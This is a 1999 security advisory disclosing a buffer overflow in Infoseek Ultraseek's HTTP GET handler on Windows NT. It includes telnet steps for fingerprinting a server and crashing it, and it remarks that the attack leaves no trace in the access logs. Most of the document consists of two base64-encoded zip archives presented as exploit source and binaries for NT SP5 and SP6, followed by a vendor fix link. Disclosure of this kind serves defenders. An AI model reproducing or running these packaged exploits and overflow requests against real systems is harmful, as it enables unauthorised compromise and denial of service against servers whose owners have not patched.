COMMAND
Infoseek Ultraseek
SYSTEMS AFFECTED
Infoseek Ultraseek 2.1 to 3.1 and possibly others (NT only)
PROBLEM
USSR & eEye DS Present found following.
The Opener:
T1 Internet Connection: $1,000/month
Dell PowerEdge 4350 Server: $4,307
10k Doc. license for Ultraseek 3.1: $4,995
Brand new office in silicon valley: $10,000/month
The look on your CEO's face when you get hacked: Priceless.
Ultraseek is Infoseek Corporation's search engine software. The
power and flexibility of Ultraseek allow it to be used by a
variety of business's. From the small mom and pop shops to
companies even as large as Infoseek themselves. You've heard of
go.com by now, haven't you?
This advisory, although a rather nasty one, will be pretty small.
We are not going to get into the mechanics of buffer overflows
since the subject has been talked about a lot.
By default the Ultraseek search engine listens on port 8765 and
provides a HTTP interface to allow internet/intranet users to
search a server for documents pertaining to their search keywords.
To identify a vulnerable server you would do the following:
C:\>telnet www.example.com 8765
send-> HEAD / HTTP/1.0
recv-> HTTP/1.0 200 OK
recv-> Server: Ultraseek/3.1 Python/1.5.1
recv-> Date: Thu, XX Dec 1999 23:59:42 GMT
recv-> Content-type: text/html
recv-> Content-length: 0
Ultraseek 3.1 is the current version of Ultraseek as of the
writing of this advisory. USSR&eEye tested versions as old as
2.1. So while they are not positive, they are pretty sure every
version of Ultraseek prior to 3.1 is vulnerable.
The overflow occurs in the HTTP Get command. To DoS (Denial of
Service) the server you would do the following:
C:\>telnet www.example.com 8765
GET /[overflow]/ HTTP/1.0
<enter>
<enter>
At this point one of the two pyseekd.exe (Ultraseek Server
Process) will drop and reinitialize. Since it is a service you
will never get an on screen memory error. Also you will not even
really notice the process drop and reload but if you look closely
when you DoS the server one of the two pyseekd.exe process's will
now have a new PID.
This is just like any typical buffer overflow and it is
exploitable. To download a proof of concept exploit, go to:
http://www.ussrback.com/
http://www.eeye.com/
or go below as there is mimed version of it.
Note: The example will just create a file called ussreeye.txt in
whatever the current root is. This exploit has only been tested
against Ultraseek 2.1 for NT Service Pack 5 and NT Service Pack 6.
Please do not send eMail saying you could not get it to work or
things of that nature. If you can't fix it yourself then most
likely you do not need to be using it in the first place.
What gets logged you ask? Well in the application event log you
will see a Warning with the following information: "Ultraseek
Server: Warning: restarted 3.1.4". In the Ultraseek http access
logs (C:\Program Files\Infoseek\UltraseekServer\data\logs) nothing
gets logged. So when all is said and done unless you have a
router log to match the event log time with... your left with no
way of knowing who did the dirty deed.
Once again a web service, just like IIS, fails to log a command
before it processes. Any service that takes commands needs to log
the command first and then process it. That way unless there is an
overflow in the logging process we will always know what IP
performed the attack.
SP5 source exploit (mimed):
---
Content-Type: application/octet-stream; name="sp5.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="sp5.zip"
Content-MD5: 86NduFJBnsY7NfRyG2FCpQ==
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
-----
SP6 source exploit (mimed):
---
Content-Type: application/octet-stream; name="sp6.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="sp6.zip"
Content-MD5: RIOXwTGdEf+g5fegO/DPxQ==
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
-----
SOLUTION
Fix:
http://software.infoseek.com/products/ultraseek/upgrade_nt.htm
ftp://ftp.infoseek.com/pub/software/ultraseek-3.1.5.exe